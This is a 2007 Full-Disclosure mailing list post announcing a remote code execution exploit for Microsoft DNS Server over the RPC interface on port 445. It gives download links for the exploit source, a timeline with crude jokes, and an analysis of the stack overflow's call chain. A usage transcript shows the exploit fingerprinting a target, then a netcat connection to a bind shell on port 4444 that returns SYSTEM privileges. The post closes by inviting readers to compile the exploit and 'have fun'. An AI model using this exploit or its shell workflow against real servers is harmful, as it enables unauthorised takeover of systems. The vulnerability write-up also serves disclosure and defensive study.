Microsoft DNS Server Remote Code execution Exploit and analysis

["Andres Tarasco" <atarasco () gmail com>]

Hi,

im sending you the headers of the new exploit code for microsoft DNS
servers. You can download the full source code exploit and analysis at:

- http://www.514.es/Microsoft_Dns_Server_Exploit.zip
or
- http://www.48bits.com/exploits/dnsxpl.rar


Microsoft DNS Server Remote Code execution Exploit and analysis
  Advisory: http://www.microsoft.com/technet/security/advisory/935964.mspx
  This remote exploit works against port 445 (also Microsoft RPC api used)

 Author:
 * Mario Ballano  ( mballano~gmail.com )
 * Andres Tarasco ( atarasco~gmail.com )

 Timeline:
 * April,12,2007: Microsoft advisory published
 * April,13,2007: POC Exploit coded
 * April,14,2007: Microsoft notified about a new attack vector against port
445 (this exploit code)
 * April,14,2007: Working exploit for Windows 2000 server SP4 (Spanish)
 * April,15,2007: Working exploit for Windows 2003 server SP2 (Spanish) /GS
bypassed
 * April,16,2007: hackers hax the w0rld and got busted.
 * April,xx,2007: Lammer release the first buggy worm
 * Xxxxx,xx,2007: Finally it was true. Nacked photos of Gary m.. being
abducted were found at NSA servers


 Usage:
 D:\DNSTEST>dnstest.exe 192.168.1.7
   -------------------------------------------------------
   Microsoft Dns Server local & remote RPC Exploit code (port 445)
   Exploit code by Andres Tarasco & Mario Ballano
   Tested against Windows 2000 server SP4 and Windows 2003 SP2 (Spanish)
   -------------------------------------------------------

  [+] Trying to fingerprint target.. 05 02
  [+] Remote Host identified as Windows 2003
  [+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_np:
192.168.1.7[\\pipe\\dnsserver]
  [+] RpcBindingFromStringBinding returned 0x0
  [+] Calling remote procedure DnssrvOperation()
  [+] Now try to connect to port 4444

 D:\DNSTEST>nc 192.168.1.7 4444
  Microsoft Windows [Version 5.2.3790]
  (C) Copyright 1985-2003 Microsoft Corp.

  C:\WINDOWS\system32>whoami
  nt authority\system

 Vulnerability Analysis:

 The function Lookup_ZoneTreeNodeFromDottedName() uses a fixed local buffer
to convert
 a string calling Name_ConvertFileNameToCountName(), this string can
contain back-slash
 octal characters. Although some bounds checks are done when writting to
the buffer is
 still possible to bypass them using a string with multiple backslashed
chars, resulting
 in a stack based buffer overflow.

 This function can be reached through DNS RPC Interface, the execution flow

 will be as follows:

 R_DnssrvQuery(pa,buggybuffer,pc,DesiredAccess,pd);                  // RPC
Exported function
 R_DnssrvQuery2(0,0,pa,buggybuffer,pc,DesiredAccess,pd);
 RpcUtil_FindZone(buggybuffer,1,DesiredAccess);
 Zone_FindZoneByName(buggybuffer);                                   //
Here we go!
 Lookup_ZoneTreeNodeFromDottedName(buggybuffer,0,0x2000000);
           Name_ConvertFileNameToCountName(localbuffer,buggybuffer,0); //
Using fixed size local buffer
                   extractQuotedChar(x,x,buggybuffer);               //
Extract octal number
 Disassemblies at the end of the code:

 References:
 - Defeating the Stack Based Buffer Overflow Prevention Mechanism of
Microsoft Windows 2003 Server. (David Litchfield, NGSSoftware).
 - www.48bits.com
 - http://www.514.es

 Just compile the code with nmake and have fun!


*/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/